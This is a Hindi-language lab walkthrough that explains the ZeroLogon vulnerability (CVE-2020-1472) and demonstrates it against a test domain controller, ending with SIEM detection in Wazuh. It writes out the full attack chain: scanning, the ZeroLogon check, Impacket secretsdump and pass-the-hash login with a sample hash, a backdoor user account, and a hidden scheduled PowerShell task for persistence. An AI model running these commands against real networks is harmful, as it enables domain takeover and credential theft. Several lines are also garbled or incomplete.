
ZeroLogon भेद्यता (CVE-2020-1472) की व्याख्या और प्रदर्शन
ZeroLogon (CVE-2020-1472) भेद्यता का स्पष्टीकरण और प्रदर्शन
इस प्रयोगशाला का उद्देश्य पूर्णतः शैक्षिक है। इसे उत्पादन वातावरण या उन वातावरणों में चलाने की अनुशंसा नहीं की जाती जो आपके नहीं हैं।
भेद्यता का संदर्भ
यह भेद्यता एक साइबर अपराधी को डोमेन नियंत्रक (DC) का नियंत्रण लेने की अनुमति देती है। यह नियंत्रक पर एक सेवा खाते का पासवर्ड बदलकर या हटाकर किया जाता है। दुर्भावनापूर्ण एजेंट केवल सेवा अस्वीकार कर सकता है या नियंत्रण ले सकता है और पूरे नेटवर्क पर कब्ज़ा कर सकता है। अगस्त 2020 में, माइक्रोसॉफ्ट ने एक पैच जारी किया।
प्रभावित घटक: Microsoft Netlogon Remote Protocol (MS-NRPC)
प्रभावित Windows संस्करण:
रिपॉजिटरीज़ क्लोन करें
यदि स्थानीय रूप से चलाना है!
AWS पर भी इन इमेज के साथ संभव है (बिलिंग का ध्यान रखें)
अतिरिक्त: SIEM घटनाओं के विश्लेषण के लिए Wazuh खाता।
सुझाव: Kali Linux में, SSH सेवा डिफ़ॉल्ट रूप से अक्षम है — इसे मैन्युअल रूप से प्रारंभ करना आवश्यक है।
सर्वर के असुरक्षित होने की जाँच करने से पहले, हम nmap का उपयोग कर सकते हैं यह देखने के लिए कि कौन से पोर्ट खुले हैं:
nmap -sS -T4 -F --open -n ip
का उपयोग करते हुए CVE-2020-1472 - जांचें कि लक्ष्य सर्वर असुरक्षित है या नहीं। कमांड चलाएँ:
zerologon_tester.py <dc-name> <dc-ip>
secretdump उपकरण Impacket की एक टूलकिट है।
python3 secretsdump.py -just-dc wayne/w2008\[email protected]
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
यदि सब कुछ ठीक रहा, तो हम हैश के साथ लॉगिन करने में सक्षम होंगे What is a pass-the-hash attack?
अब बस एक स्थिरता बनाएं! यह एक नया उपयोगकर्ता हो सकता है!
net user coringa Batman2025 /add
हो गया! उपयोगकर्ता सफलतापूर्वक बनाया गया!
एक कार्य बनाना भी संभव है!
mkdir C:\Temp
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# backup script'\"" /SC ONLOGON /RL HIGHEST /F
उपयोगकर्ता निर्माण और pass-the-hash से संबंधित घटनाओं तथा उपयोगकर्ता निर्माण को देखना संभव है!